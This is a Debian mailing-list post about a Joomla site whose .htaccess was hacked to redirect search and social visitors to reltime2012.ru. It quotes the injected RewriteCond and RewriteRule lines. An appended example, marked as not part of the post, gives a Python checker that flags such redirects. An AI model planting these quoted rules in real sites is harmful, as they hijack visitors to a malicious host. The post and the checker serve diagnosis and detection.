Hacked .htaccess redirect to htttp://reltime2012.ru/frunleh?9
Dear debianusers,
Does anyone know how to protect against unauthorized changes to .htaccess?
I googled the "htttp://reltime2012.ru/frunleh?9 redirect problem" and
found out that a lot of sites (mainly using WordPress) got hacked and
are redirected to a Russian site.
One of my sites, which runs Joomla (and not WordPress), also got hacked (again).
At the beginning of the .htaccess one can read:
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ htttp://reltime2012.ru/frunleh?9 [R=301,L]
I found some tutorials on how to fix the problem:
http://newmediamike.com/2012/07/reltime-2012-frunleh-redirection/
http://wptrainingonline.com/
But none of them explains how to protect against the problem and prevent it
from happening again. This Google forum has a post stating that
http://productforums.google.com/forum/#!topic/webmasters/GsB423gsIlk
"the sysadmin told me that there was a php script entitled
"jos_jpxn.php" running that was rewriting my .htaccess" (lickface)
But I found no such script among my files.
(Of course, I changed my password, but I don't really think that is
the problem...)
I know it is easy to fix. I just wonder if I can prevent that from
happening again. I'm considering simply putting in a "cron job" that rewrites
my .htaccess from time to time! :)
Has anyone else seen this problem?
Thanks,
Beco
--
Dr. Beco
A.I. research, Cognitive Scientist and Philosopher
Linux Counter #201942
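
Added example, not part of the original post: a small checker that a cron job could run to detect the kind of referer-conditional redirect quoted above, rather than blindly overwriting the file. The function names, the sample rules and the host redirect.example.invalid are assumptions made for illustration.

```python
"""Flag .htaccess RewriteRules that redirect visitors to a foreign host."""
import re
import sys

ABSOLUTE_URL = re.compile(r"^[a-z][a-z0-9+.-]*://([^/?#:]+)", re.I)
# Constructed sample input; redirect.example.invalid is a placeholder host.
SAMPLE = r"""RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing)\.(.*)
RewriteRule ^(.*)$ http://redirect.example.invalid/x?9 [R=301,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php [L]
"""

def logical_lines(text):
    """Yield (first_line_no, line) with backslash continuations joined."""
    buf, start = "", 1
    for no, raw in enumerate(text.splitlines() + [""], 1):
        start = start if buf else no
        if raw.endswith("\\"):
            buf += raw[:-1] + " "
        else:
            yield start, buf + raw
            buf = ""

def find_foreign_redirects(text, own_hosts=()):
    """Return (line_no, host, referer_guarded) per RewriteRule aimed at a host outside own_hosts."""
    own = {h.lower() for h in own_hosts}
    findings, conds = [], []
    for no, line in logical_lines(text):
        parts = line.split()  # naive split: quoted arguments with spaces unsupported
        if len(parts) < 3 or parts[0].startswith("#"):
            continue
        name = parts[0].lower()
        if name == "rewritecond":
            conds.append(parts[1].upper())
        elif name == "rewriterule":
            m = ABSOLUTE_URL.match(parts[2])
            if m and m.group(1).lower() not in own:
                guarded = any("%{HTTP_REFERER}" in c for c in conds)
                findings.append((no, m.group(1).lower(), guarded))
            conds = []  # conditions apply only to the next RewriteRule
    return findings

if __name__ == "__main__":
    # Assumed usage: script.py /path/to/.htaccess [own-host ...]; no args = SAMPLE
    text = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE
    hits = find_foreign_redirects(text, sys.argv[2:])
    print(hits)
    sys.exit(1 if hits else 0)
```

The non-zero exit status on a finding lets cron mail the output to the administrator. A rule flagged with referer_guarded set to True only fires for visitors arriving from the listed sites, which is why the owner browsing the site directly does not see the redirect.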